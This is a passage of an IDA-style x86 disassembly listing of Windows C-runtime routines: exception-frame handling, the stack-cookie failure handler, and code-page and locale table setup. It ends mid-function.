sub_4047C5	proc near		; CODE XREF: sub_40BE69+65p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		mov	eax, [ebp+arg_4]
		add	eax, 0Ch
		mov	[ebp+var_4], eax
		mov	ebx, large fs:0
		mov	eax, [ebx]
		mov	large fs:0, eax
		mov	eax, [ebp+arg_0]
		mov	ebx, [ebp+arg_4]
		mov	ebp, [ebp+var_4]
		mov	esp, [ebx-4]
		jmp	eax
sub_4047C5	endp

; ---------------------------------------------------------------------------
		pop	ebx
		leave
		retn	8

; =============== S U B	R O U T	I N E =======================================



sub_4047F5	proc near		; CODE XREF: sub_40B982+31p
					; sub_40BDD8+59p ...

arg_4		= dword	ptr  8

		pop	eax
		pop	ecx
		xchg	eax, [esp-8+arg_4]
		jmp	eax
sub_4047F5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4047FC	proc near		; CODE XREF: sub_404989+69p
					; sub_40BE69:loc_40BE91p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	ebx
		push	esi
		push	edi
		mov	esi, large fs:0
		mov	[ebp+var_4], esi
		mov	[ebp+var_8], offset loc_404825
		push	0
		push	[ebp+arg_4]
		push	[ebp+var_8]
		push	[ebp+arg_0]
		call	sub_413F36

loc_404825:				; DATA XREF: sub_4047FC+12o
		mov	eax, [ebp+arg_4]
		mov	eax, [eax+4]
		and	eax, 0FFFFFFFDh
		mov	ecx, [ebp+arg_4]
		mov	[ecx+4], eax
		mov	edi, large fs:0
		mov	ebx, [ebp+var_4]
		mov	[ebx], edi
		mov	large fs:0, ebx
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	8
sub_4047FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40484E	proc near		; CODE XREF: .text:0041CD79j
					; .text:0041CD94j ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 8
		push	ebx
		push	esi
		push	edi
		cld
		mov	[ebp+var_4], eax
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	[ebp+var_4]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40C335
		add	esp, 20h
		mov	[ebp+var_8], eax
		pop	edi
		pop	esi
		pop	ebx
		mov	eax, [ebp+var_8]
		mov	esp, ebp
		pop	ebp
		retn
sub_40484E	endp

; ---------------------------------------------------------------------------

loc_404884:				; DATA XREF: sub_404B2E+24o
		push	esi
		cld
		mov	esi, [esp+0Ch]
		mov	ecx, [esi+8]
		xor	ecx, esi
		call	sub_402C9E
		push	0
		push	esi
		push	dword ptr [esi+14h]
		push	dword ptr [esi+0Ch]
		push	0
		push	dword ptr [esp+24h]
		push	dword ptr [esi+10h]
		push	dword ptr [esp+24h]
		call	sub_40C335
		add	esp, 20h
		pop	esi
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4048B4	proc near		; CODE XREF: sub_404989+81p
					; sub_40BED5+53p

var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		sub	esp, 38h
		push	ebx
		cmp	[ebp+arg_0], 123h
		jnz	short loc_4048D6
		mov	eax, offset loc_40495D
		mov	ecx, [ebp+arg_4]
		mov	[ecx], eax
		xor	eax, eax
		inc	eax
		jmp	loc_404986
; ---------------------------------------------------------------------------

loc_4048D6:				; CODE XREF: sub_4048B4+Ej
		and	[ebp+var_28], 0
		mov	[ebp+var_24], offset sub_404989
		mov	eax, dword_424064
		lea	ecx, [ebp+var_28]
		xor	eax, ecx
		mov	[ebp+var_20], eax
		mov	eax, [ebp+arg_10]
		mov	[ebp+var_1C], eax
		mov	eax, [ebp+arg_4]
		mov	[ebp+var_18], eax
		mov	eax, [ebp+arg_14]
		mov	[ebp+var_14], eax
		mov	eax, [ebp+arg_18]
		mov	[ebp+var_10], eax
		and	[ebp+var_C], 0
		and	[ebp+var_8], 0
		and	[ebp+var_4], 0
		mov	[ebp+var_C], esp
		mov	[ebp+var_8], ebp
		mov	eax, large fs:0
		mov	[ebp+var_28], eax
		lea	eax, [ebp+var_28]
		mov	large fs:0, eax
		mov	[ebp+var_38], 1
		mov	eax, [ebp+arg_0]
		mov	[ebp+var_34], eax
		mov	eax, [ebp+arg_8]
		mov	[ebp+var_30], eax
		call	sub_40595D
		mov	eax, [eax+80h]
		mov	[ebp+var_2C], eax
		lea	eax, [ebp+var_34]
		push	eax
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax]
		call	[ebp+var_2C]
		pop	ecx
		pop	ecx
		and	[ebp+var_38], 0

loc_40495D:				; DATA XREF: sub_4048B4+10o
		cmp	[ebp+var_4], 0
		jz	short loc_40497A
		mov	ebx, large fs:0
		mov	eax, [ebx]
		mov	ebx, [ebp+var_28]
		mov	[ebx], eax
		mov	large fs:0, ebx
		jmp	short loc_404983
; ---------------------------------------------------------------------------

loc_40497A:				; CODE XREF: sub_4048B4+ADj
		mov	eax, [ebp+var_28]
		mov	large fs:0, eax

loc_404983:				; CODE XREF: sub_4048B4+C4j
		mov	eax, [ebp+var_38]

loc_404986:				; CODE XREF: sub_4048B4+1Dj
		pop	ebx
		leave
		retn
sub_4048B4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404989	proc near		; DATA XREF: sub_4048B4+26o

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		cld
		mov	eax, [ebp+arg_4]
		mov	ecx, [eax+8]
		xor	ecx, [ebp+arg_4]
		call	sub_402C9E
		mov	eax, [ebp+arg_0]
		mov	eax, [eax+4]
		and	eax, 66h
		jz	short loc_4049B9
		mov	eax, [ebp+arg_4]
		mov	dword ptr [eax+24h], 1
		xor	eax, eax
		inc	eax
		jmp	short loc_404A23
; ---------------------------------------------------------------------------
		jmp	short loc_404A23
; ---------------------------------------------------------------------------

loc_4049B9:				; CODE XREF: sub_404989+1Dj
		push	1
		mov	eax, [ebp+arg_4]
		push	dword ptr [eax+18h]
		mov	eax, [ebp+arg_4]
		push	dword ptr [eax+14h]
		mov	eax, [ebp+arg_4]
		push	dword ptr [eax+0Ch]
		push	0
		push	[ebp+arg_8]
		mov	eax, [ebp+arg_4]
		push	dword ptr [eax+10h]
		push	[ebp+arg_0]
		call	sub_40C335
		add	esp, 20h
		mov	eax, [ebp+arg_4]
		cmp	dword ptr [eax+24h], 0
		jnz	short loc_4049F7
		push	[ebp+arg_0]
		push	[ebp+arg_4]
		call	sub_4047FC

loc_4049F7:				; CODE XREF: sub_404989+61j
		push	0
		push	0
		push	0
		push	0
		push	0
		lea	eax, [ebp+var_4]
		push	eax
		push	123h
		call	sub_4048B4
		add	esp, 1Ch
		mov	eax, [ebp+var_4]
		mov	ebx, [ebp+arg_4]
		mov	esp, [ebx+1Ch]
		mov	ebp, [ebx+20h]
		jmp	eax
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax

loc_404A23:				; CODE XREF: sub_404989+2Cj
					; sub_404989+2Ej
		pop	ebx
		leave
		retn
sub_404989	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404A26	proc near		; CODE XREF: sub_40BED5+81p
					; sub_40BFC7+1C6p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_0]
		mov	eax, [edi+10h]
		mov	esi, [edi+0Ch]
		mov	[ebp+var_4], eax
		mov	ebx, esi
		jmp	short loc_404A6A
; ---------------------------------------------------------------------------

loc_404A3D:				; CODE XREF: sub_404A26+4Bj
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_404A47
		call	sub_40C465

loc_404A47:				; CODE XREF: sub_404A26+1Aj
		mov	ecx, [ebp+var_4]
		dec	esi
		mov	eax, esi
		imul	eax, 14h
		add	eax, ecx
		mov	ecx, [ebp+arg_8]
		cmp	[eax+4], ecx
		jge	short loc_404A5F
		cmp	ecx, [eax+8]
		jle	short loc_404A64

loc_404A5F:				; CODE XREF: sub_404A26+32j
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_404A6D

loc_404A64:				; CODE XREF: sub_404A26+37j
		dec	[ebp+arg_4]
		mov	ebx, [ebp+arg_0]

loc_404A6A:				; CODE XREF: sub_404A26+15j
		mov	[ebp+arg_0], esi

loc_404A6D:				; CODE XREF: sub_404A26+3Cj
		cmp	[ebp+arg_4], 0
		jge	short loc_404A3D
		mov	eax, [ebp+arg_C]
		inc	esi
		mov	[eax], esi
		mov	eax, [ebp+arg_10]
		mov	[eax], ebx
		cmp	ebx, [edi+0Ch]
		ja	short loc_404A87
		cmp	esi, ebx
		jbe	short loc_404A8C

loc_404A87:				; CODE XREF: sub_404A26+5Bj
		call	sub_40C465

loc_404A8C:				; CODE XREF: sub_404A26+5Fj
		mov	eax, esi
		imul	eax, 14h
		add	eax, [ebp+var_4]
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_404A26	endp


; =============== S U B	R O U T	I N E =======================================



sub_404A99	proc near		; CODE XREF: sub_40BABD+28p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_4]
		push	esi
		mov	esi, [esp+4+arg_0]
		mov	[esi], eax
		call	sub_40595D
		mov	eax, [eax+98h]
		mov	[esi+4], eax
		call	sub_40595D
		mov	[eax+98h], esi
		mov	eax, esi
		pop	esi
		retn
sub_404A99	endp


; =============== S U B	R O U T	I N E =======================================



sub_404AC1	proc near		; CODE XREF: sub_40BBE3+60p

arg_0		= dword	ptr  4

		call	sub_40595D
		mov	eax, [eax+98h]
		jmp	short loc_404AD9
; ---------------------------------------------------------------------------

loc_404ACE:				; CODE XREF: sub_404AC1+1Aj
		mov	ecx, [eax]
		cmp	ecx, [esp+arg_0]
		jz	short loc_404ADF
		mov	eax, [eax+4]

loc_404AD9:				; CODE XREF: sub_404AC1+Bj
		test	eax, eax
		jnz	short loc_404ACE
		inc	eax
		retn
; ---------------------------------------------------------------------------

loc_404ADF:				; CODE XREF: sub_404AC1+13j
		xor	eax, eax
		retn
sub_404AC1	endp


; =============== S U B	R O U T	I N E =======================================



sub_404AE2	proc near		; CODE XREF: sub_40BBE3+9p

arg_0		= dword	ptr  4

		push	esi
		call	sub_40595D
		mov	esi, [esp+4+arg_0]
		cmp	esi, [eax+98h]
		jnz	short loc_404B04
		call	sub_40595D
		mov	ecx, [esi+4]
		mov	[eax+98h], ecx
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_404B04:				; CODE XREF: sub_404AE2+10j
		call	sub_40595D
		mov	eax, [eax+98h]
		jmp	short loc_404B1A
; ---------------------------------------------------------------------------

loc_404B11:				; CODE XREF: sub_404AE2+3Cj
		mov	ecx, [eax+4]
		cmp	esi, ecx
		jz	short loc_404B26
		mov	eax, ecx

loc_404B1A:				; CODE XREF: sub_404AE2+2Dj
		cmp	dword ptr [eax+4], 0
		jnz	short loc_404B11
		pop	esi
		jmp	sub_40C465
; ---------------------------------------------------------------------------

loc_404B26:				; CODE XREF: sub_404AE2+34j
		mov	ecx, [esi+4]
		mov	[eax+4], ecx
		pop	esi
		retn
sub_404AE2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404B2E	proc near		; CODE XREF: sub_40BABD+7Fp

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	eax, dword_424064
		and	[ebp+var_18], 0
		lea	ecx, [ebp+var_18]
		xor	eax, ecx
		mov	ecx, [ebp+arg_0]
		mov	[ebp+var_10], eax
		mov	eax, [ebp+arg_4]
		mov	[ebp+var_C], eax
		mov	eax, [ebp+arg_C]
		inc	eax
		mov	[ebp+var_14], offset loc_404884
		mov	[ebp+var_8], ecx
		mov	[ebp+var_4], eax
		mov	eax, large fs:0
		mov	[ebp+var_18], eax
		lea	eax, [ebp+var_18]
		mov	large fs:0, eax
		push	[ebp+arg_10]
		push	ecx
		push	[ebp+arg_8]
		call	sub_40C4B0
		mov	ecx, eax
		mov	eax, [ebp+var_18]
		mov	large fs:0, eax
		mov	eax, ecx
		leave
		retn
sub_404B2E	endp


; =============== S U B	R O U T	I N E =======================================



sub_404B8C	proc near		; CODE XREF: sub_401065+7p
					; sub_40121E+7p ...

arg_0		= byte ptr  4

		push	eax
		push	large dword ptr	fs:0
		lea	eax, [esp+8+arg_0]
		sub	esp, [esp+0Ch]
		push	ebx
		push	esi
		push	edi
		mov	[eax], ebp
		mov	ebp, eax
		mov	eax, dword_424064
		xor	eax, ebp
		push	eax
		push	dword ptr [ebp-4]
		mov	dword ptr [ebp-4], 0FFFFFFFFh
		lea	eax, [ebp-0Ch]
		mov	large fs:0, eax
		retn
sub_404B8C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404BBF	proc near		; CODE XREF: sub_401442+7p
					; sub_40BA74+7p

arg_0		= byte ptr  4

		push	eax
		push	large dword ptr	fs:0
		lea	eax, [esp+8+arg_0]
		sub	esp, [esp+0Ch]
		push	ebx
		push	esi
		push	edi
		mov	[eax], ebp
		mov	ebp, eax
		mov	eax, dword_424064
		xor	eax, ebp
		push	eax
		mov	[ebp-10h], esp
		push	dword ptr [ebp-4]
		mov	dword ptr [ebp-4], 0FFFFFFFFh
		lea	eax, [ebp-0Ch]
		mov	large fs:0, eax
		retn
sub_404BBF	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404BF5	proc near		; CODE XREF: sub_40177B+Ap
					; sub_4019F3+Ap ...

arg_0		= byte ptr  4

		push	eax
		push	large dword ptr	fs:0
		lea	eax, [esp+8+arg_0]
		sub	esp, [esp+0Ch]
		push	ebx
		push	esi
		push	edi
		mov	[eax], ebp
		mov	ebp, eax
		mov	eax, dword_424064
		xor	eax, ebp
		push	eax
		mov	[ebp-10h], eax
		push	dword ptr [ebp-4]
		mov	dword ptr [ebp-4], 0FFFFFFFFh
		lea	eax, [ebp-0Ch]
		mov	large fs:0, eax
		retn
sub_404BF5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404C2B	proc near		; CODE XREF: sub_401065+2Dp
					; sub_40121E+6Bp ...
		mov	ecx, [ebp-0Ch]
		mov	large fs:0, ecx
		pop	ecx
		pop	edi
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		push	ecx
		retn
sub_404C2B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404C3F	proc near		; CODE XREF: sub_40177B:loc_4019EBp
					; sub_4019F3:loc_401C15p ...
		mov	ecx, [ebp-10h]
		xor	ecx, ebp
		call	sub_402C9E
		jmp	sub_404C2B
sub_404C3F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404C4E	proc near		; CODE XREF: sub_402C9E:loc_402CA8j

var_328		= dword	ptr -328h
var_324		= dword	ptr -324h
var_320		= dword	ptr -320h
arg_0		= byte ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 328h
		mov	dword_4286C8, eax
		mov	dword_4286C4, ecx
		mov	dword_4286C0, edx
		mov	dword_4286BC, ebx
		mov	dword_4286B8, esi
		mov	dword_4286B4, edi
		mov	word_4286E0, ss
		mov	word_4286D4, cs
		mov	word_4286B0, ds
		mov	word_4286AC, es
		mov	word_4286A8, fs
		mov	word_4286A4, gs
		pushf
		pop	dword_4286D8
		mov	eax, [ebp+0]
		mov	dword_4286CC, eax
		mov	eax, [ebp+4]
		mov	dword_4286D0, eax
		lea	eax, [ebp+arg_0]
		mov	dword_4286DC, eax
		mov	eax, [ebp+var_320]
		mov	dword_428618, 10001h
		mov	eax, dword_4286D0
		mov	dword_4285CC, eax
		mov	dword_4285C0, 0C0000409h
		mov	dword_4285C4, 1
		mov	eax, dword_424064
		mov	[ebp+var_328], eax
		mov	eax, dword_424068
		mov	[ebp+var_324], eax
		call	ds:off_41E08C
		mov	dword_428610, eax
		push	1
		call	sub_408125
		pop	ecx
		push	0
		call	ds:dword_41E19C	; SetUnhandledExceptionFilter
		push	offset off_41E418
		call	ds:off_41E198
		cmp	dword_428610, 0
		jnz	short loc_404D3E
		push	1
		call	sub_408125
		pop	ecx

loc_404D3E:				; CODE XREF: sub_404C4E+E6j
		push	0C0000409h
		call	ds:dword_41E0C8	; GetCurrentProcess
		push	eax
		call	ds:off_41E0F4
		leave
		retn
sub_404C4E	endp


; =============== S U B	R O U T	I N E =======================================



sub_404D52	proc near		; CODE XREF: sub_40507E+11Ep
					; sub_40507E+173p
		sub	eax, 3A4h
		jz	short loc_404D7B
		sub	eax, 4
		jz	short loc_404D75
		sub	eax, 0Dh
		jz	short loc_404D6F
		dec	eax
		jz	short loc_404D69
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_404D69:				; CODE XREF: sub_404D52+12j
		mov	eax, 404h
		retn
; ---------------------------------------------------------------------------

loc_404D6F:				; CODE XREF: sub_404D52+Fj
		mov	eax, 412h
		retn
; ---------------------------------------------------------------------------

loc_404D75:				; CODE XREF: sub_404D52+Aj
		mov	eax, 804h
		retn
; ---------------------------------------------------------------------------

loc_404D7B:				; CODE XREF: sub_404D52+5j
		mov	eax, 411h
		retn
sub_404D52	endp


; =============== S U B	R O U T	I N E =======================================



sub_404D81	proc near		; CODE XREF: sub_40507E+2Bp
		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	ebp, 101h
		mov	esi, eax
		push	ebp
		xor	edi, edi
		lea	ebx, [esi+1Ch]
		push	edi
		push	ebx
		call	sub_408130
		mov	[esi+4], edi
		mov	[esi+8], edi
		mov	[esi+0Ch], edi
		xor	eax, eax
		lea	edi, [esi+10h]
		stosd
		stosd
		stosd
		mov	eax, offset dword_424070
		add	esp, 0Ch
		sub	eax, esi

loc_404DB4:				; CODE XREF: sub_404D81+3Aj
		mov	cl, [eax+ebx]
		mov	[ebx], cl
		inc	ebx
		dec	ebp
		jnz	short loc_404DB4
		lea	ecx, [esi+11Dh]
		mov	esi, 100h

loc_404DC8:				; CODE XREF: sub_404D81+4Ej
		mov	dl, [ecx+eax]
		mov	[ecx], dl
		inc	ecx
		dec	esi
		jnz	short loc_404DC8
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
sub_404D81	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=49Ch


sub_404DD6	proc near		; CODE XREF: sub_40507E+141p

var_51C		= dword	ptr -51Ch
var_518		= byte ptr -518h
var_512		= byte ptr -512h
var_511		= byte ptr -511h
var_504		= word ptr -504h
var_304		= byte ptr -304h
var_204		= byte ptr -204h
var_104		= byte ptr -104h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-49Ch]
		sub	esp, 51Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+49Ch+var_4], eax
		push	ebx
		push	edi
		lea	eax, [ebp+49Ch+var_518]
		push	eax
		push	dword ptr [esi+4]
		call	ds:dword_41E1B4	; GetCPInfo
		test	eax, eax
		mov	edi, 100h
		jz	loc_404EFC
		xor	eax, eax

loc_404E0F:				; CODE XREF: sub_404DD6+43j
		mov	[ebp+eax+49Ch+var_104],	al
		inc	eax
		cmp	eax, edi
		jb	short loc_404E0F
		mov	al, [ebp+49Ch+var_512]
		test	al, al
		mov	[ebp+49Ch+var_104], 20h
		jz	short loc_404E54
		lea	ebx, [ebp+49Ch+var_511]

loc_404E2C:				; CODE XREF: sub_404DD6+7Cj
		movzx	ecx, al
		movzx	eax, byte ptr [ebx]
		cmp	ecx, eax
		ja	short loc_404E4C
		sub	eax, ecx
		inc	eax
		push	eax
		lea	edx, [ebp+ecx+49Ch+var_104]
		push	20h
		push	edx
		call	sub_408130
		add	esp, 0Ch

loc_404E4C:				; CODE XREF: sub_404DD6+5Ej
		inc	ebx
		mov	al, [ebx]
		inc	ebx
		test	al, al
		jnz	short loc_404E2C

loc_404E54:				; CODE XREF: sub_404DD6+51j
		push	0
		push	dword ptr [esi+0Ch]
		lea	eax, [ebp+49Ch+var_504]
		push	dword ptr [esi+4]
		push	eax
		push	edi
		lea	eax, [ebp+49Ch+var_104]
		push	eax
		push	1
		push	0
		call	sub_40CAB4
		xor	ebx, ebx
		push	ebx
		push	dword ptr [esi+4]
		lea	eax, [ebp+49Ch+var_204]
		push	edi
		push	eax
		push	edi
		lea	eax, [ebp+49Ch+var_104]
		push	eax
		push	edi
		push	dword ptr [esi+0Ch]
		push	ebx
		call	sub_40C8B9
		add	esp, 44h
		push	ebx
		push	dword ptr [esi+4]
		lea	eax, [ebp+49Ch+var_304]
		push	edi
		push	eax
		push	edi
		lea	eax, [ebp+49Ch+var_104]
		push	eax
		push	200h
		push	dword ptr [esi+0Ch]
		push	ebx
		call	sub_40C8B9
		add	esp, 24h
		xor	eax, eax

loc_404EBB:				; CODE XREF: sub_404DD6+122j
		movzx	ecx, [ebp+eax*2+49Ch+var_504]
		test	cl, 1
		jz	short loc_404ED3
		or	byte ptr [esi+eax+1Dh],	10h
		mov	cl, [ebp+eax+49Ch+var_204]
		jmp	short loc_404EE4
; ---------------------------------------------------------------------------

loc_404ED3:				; CODE XREF: sub_404DD6+EDj
		test	cl, 2
		jz	short loc_404EED
		or	byte ptr [esi+eax+1Dh],	20h
		mov	cl, [ebp+eax+49Ch+var_304]

loc_404EE4:				; CODE XREF: sub_404DD6+FBj
		mov	[esi+eax+11Dh],	cl
		jmp	short loc_404EF5
; ---------------------------------------------------------------------------

loc_404EED:				; CODE XREF: sub_404DD6+100j
		mov	byte ptr [esi+eax+11Dh], 0

loc_404EF5:				; CODE XREF: sub_404DD6+115j
		inc	eax
		cmp	eax, edi
		jb	short loc_404EBB
		jmp	short loc_404F49
; ---------------------------------------------------------------------------

loc_404EFC:				; CODE XREF: sub_404DD6+31j
		lea	eax, [esi+11Dh]
		mov	[ebp+49Ch+var_51C], 0FFFFFF9Fh
		xor	ecx, ecx
		sub	[ebp+49Ch+var_51C], eax

loc_404F0E:				; CODE XREF: sub_404DD6+171j
		mov	edx, [ebp+49Ch+var_51C]
		lea	eax, [esi+ecx+11Dh]
		add	edx, eax
		lea	ebx, [edx+20h]
		cmp	ebx, 19h
		ja	short loc_404F2E
		or	byte ptr [esi+ecx+1Dh],	10h
		mov	dl, cl
		add	dl, 20h
		jmp	short loc_404F3D
; ---------------------------------------------------------------------------

loc_404F2E:				; CODE XREF: sub_404DD6+14Aj
		cmp	edx, 19h
		ja	short loc_404F41
		or	byte ptr [esi+ecx+1Dh],	20h
		mov	dl, cl
		sub	dl, 20h

loc_404F3D:				; CODE XREF: sub_404DD6+156j
		mov	[eax], dl
		jmp	short loc_404F44
; ---------------------------------------------------------------------------

loc_404F41:				; CODE XREF: sub_404DD6+15Bj
		mov	byte ptr [eax],	0

loc_404F44:				; CODE XREF: sub_404DD6+169j
		inc	ecx
		cmp	ecx, edi
		jb	short loc_404F0E

loc_404F49:				; CODE XREF: sub_404DD6+124j
		mov	ecx, [ebp+49Ch+var_4]
		pop	edi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 49Ch
		leave
		retn
sub_404DD6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404F60	proc near		; CODE XREF: sub_402CAD+57p
					; sub_405229+1Ap

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	0Ch
		push	offset dword_422980
		call	__SEH_prolog4
		call	sub_40595D
		mov	edi, eax
		mov	eax, dword_424594
		test	[edi+70h], eax
		jz	short loc_404F9A
		cmp	dword ptr [edi+6Ch], 0
		jz	short loc_404F9A
		mov	esi, [edi+68h]

loc_404F86:				; CODE XREF: sub_404F60+96j
		test	esi, esi
		jnz	short loc_404F92
		push	20h
		call	sub_407E1D
		pop	ecx

loc_404F92:				; CODE XREF: sub_404F60+28j
		mov	eax, esi
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_404F9A:				; CODE XREF: sub_404F60+1Bj
					; sub_404F60+21j
		push	0Dh
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	esi, [edi+68h]
		mov	[ebp+var_1C], esi
		cmp	esi, dword_424498
		jz	short loc_404FEA
		test	esi, esi
		jz	short loc_404FD2
		push	esi
		call	ds:dword_41E18C	; InterlockedDecrement
		test	eax, eax
		jnz	short loc_404FD2
		cmp	esi, offset dword_424070
		jz	short loc_404FD2
		push	esi
		call	sub_403B91
		pop	ecx

loc_404FD2:				; CODE XREF: sub_404F60+56j
					; sub_404F60+61j ...
		mov	eax, dword_424498
		mov	[edi+68h], eax
		mov	esi, dword_424498
		mov	[ebp+var_1C], esi
		push	esi
		call	ds:dword_41E1B8	; InterlockedIncrement

loc_404FEA:				; CODE XREF: sub_404F60+52j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_404FFB
		jmp	short loc_404F86
sub_404F60	endp


; =============== S U B	R O U T	I N E =======================================



sub_404FF8	proc near		; DATA XREF: zcrshv4o:00422998o
		mov	esi, [ebp-1Ch]
sub_404FF8	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404FFB	proc near		; CODE XREF: sub_404F60+91p
		push	0Dh
		call	sub_405EDF
		pop	ecx
		retn
sub_404FFB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405004	proc near		; CODE XREF: sub_40507E+19p
					; sub_405229+25p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		xor	ebx, ebx
		push	ebx
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		cmp	esi, 0FFFFFFFEh
		mov	dword_4288E4, ebx
		jnz	short loc_40503F
		mov	dword_4288E4, 1
		call	ds:off_41E184

loc_405031:				; CODE XREF: sub_405004+50j
					; sub_405004+67j
		cmp	[ebp+var_4], bl
		jz	short loc_40507B
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_40507B
; ---------------------------------------------------------------------------

loc_40503F:				; CODE XREF: sub_405004+1Bj
		cmp	esi, 0FFFFFFFDh
		jnz	short loc_405056
		mov	dword_4288E4, 1
		call	ds:dword_41E188	; GetACP
		jmp	short loc_405031
; ---------------------------------------------------------------------------

loc_405056:				; CODE XREF: sub_405004+3Ej
		cmp	esi, 0FFFFFFFCh
		jnz	short loc_40506D
		mov	eax, [ebp+var_10]
		mov	eax, [eax+4]
		mov	dword_4288E4, 1
		jmp	short loc_405031
; ---------------------------------------------------------------------------

loc_40506D:				; CODE XREF: sub_405004+55j
		cmp	[ebp+var_4], bl
		jz	short loc_405079
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_405079:				; CODE XREF: sub_405004+6Cj
		mov	eax, esi

loc_40507B:				; CODE XREF: sub_405004+30j
					; sub_405004+39j
		pop	ebx
		leave
		retn
sub_405004	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40507E	proc near		; CODE XREF: sub_405229+5Ep

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_12		= byte ptr -12h
var_11		= byte ptr -11h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		mov	ebx, [ebp+arg_4]
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		call	sub_405004
		mov	edi, eax
		xor	esi, esi
		cmp	edi, esi
		mov	[ebp+arg_0], edi
		jnz	short loc_4050B5

loc_4050A7:				; CODE XREF: sub_40507E+193j
		mov	eax, ebx
		call	sub_404D81

loc_4050AE:				; CODE XREF: sub_40507E+146j
		xor	eax, eax
		jmp	loc_40521A
; ---------------------------------------------------------------------------

loc_4050B5:				; CODE XREF: sub_40507E+27j
		mov	[ebp+var_1C], esi
		xor	eax, eax

loc_4050BA:				; CODE XREF: sub_40507E+4Fj
